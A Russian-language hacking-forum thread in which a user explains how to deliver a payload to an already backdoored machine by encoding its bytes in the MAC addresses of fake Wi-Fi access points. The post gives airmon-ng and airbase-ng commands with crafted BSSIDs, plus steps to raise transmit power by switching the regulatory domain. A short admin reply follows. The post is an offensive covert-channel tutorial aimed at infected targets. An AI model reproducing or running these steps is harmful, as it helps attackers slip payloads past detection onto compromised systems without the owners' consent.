Перейти к содержимому





Поиск по форуму

   

 
Фотография

Передаем нагрузку по wi-fi


  • Авторизуйтесь для ответа в теме
В теме одно сообщение

#1
Ymatox

Ymatox

    Участник

  • Пользователь написал
    75 Cообщений

Super-Wifi-e1311969291846.jpg

 

 

Итак, у нас есть backdoor payload не шифрованный и без всяких прочих приблуд способных защитить нас от обнаружения. В данной схеме атакующий проводит атаку с помощью смены своего BSSID, это означает что вы сможете сменить свой BSSID и инфицировать свою цель шаг за шагом.

 

Приступаем, допустим у нас есть пейлоад “fec8b00011ddc00945f1”

  • Шаг 1 *звук гонга*: нам нужно сделать фейковую точку доступа с которую мы назовём "Фейк" (да да, мы будем максимально оригинальны) и мак адрес у неё будет 00:fe:c8:b0:00:11

- Мак адрес 00:fe:c8:b0:00:11 это наш загружаемый пейлоад т.к. название нашего пейлоада “fec8b00011ddc00945f1”?

-Это секция пейлоада “fec8b00011ddc00945f1”?

 

  • Шаг 2 *ту ту*: система с беком сканит ESSID нашего фейка и дампит BSSID для неё

-Наш код должен сделать так: fe:c8:b0:00:11 ==> fec8b00011?

 

  • Шаг 3 *кря*: атакующая система создаёт фейковую точку доступа с именем "Фейк" и маком 00:dd:c0:09:45:f1

-Мак-адрес 00:dd:c0:09:45:f1 это наш инжектируемый пейлоад “ddc00945f1”?

-Это секция пейлоада “fec8b00011ddc00945f1”?

 

  • Шаг 4 *вы что-нибудь слышите?*:система с бекдором должна дампить данную секцию BSSID или мак dd:c0:09:45:f1 ==> ddc00945f1

После данных шагов со сканом мы имеем пейлоад fec8b00011ddc00945f1 в инфицированной системе. Теперь, разобравшись как работает данный метод мы рассмотрим команды для создания фейк AP.

ifconfig wlan0 down
iw reg set BO
ifconfig wlan0 up
iwconfig wlan0 txpower 30

 

 

с помощью этих команд мы увеличиваем мощность нашей AP

 

Примечание: эти команды нужно писать до создания wlan0mon для вашего wlan0. Создания монитора для wlan карты это обязательный шаг для создания фейковой AP. Делаем монитор этой командой: "airmon-ng start wlan0", если не работает, то используйте команду iwconfig и посмотрите название своего адаптера.

 

Дальше пойдут команды с кратким описанием:

  • airmon-ng start wlan0 - запускаем интерфейс
  • airbase-ng -a 00:fe:c8:b0:00:11 –essid “Fake” -I 10 -0 wlan0mon - делаем первый кусок пейлоада
  • sleep 15 - дайте точке поспать 15 секунд
  • killall airbase-ng - если у точки бессонница
  • airbase-ng -a 00:dd:c0:09:45:f1 –essid “Fake” -I 10 -0 wlan0mon - второй кусок пейлоада
  • sleep 15 - дайте точке поспать 15 секунд
  • killall airbase-ng - если у точки бессонница

Итак, надеюсь всё заработало.

 


  • 0

#2
SoA

SoA

    Администратор

  • Пользователь написал
    1 295 Cообщений

Флуд?


  • 0




Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных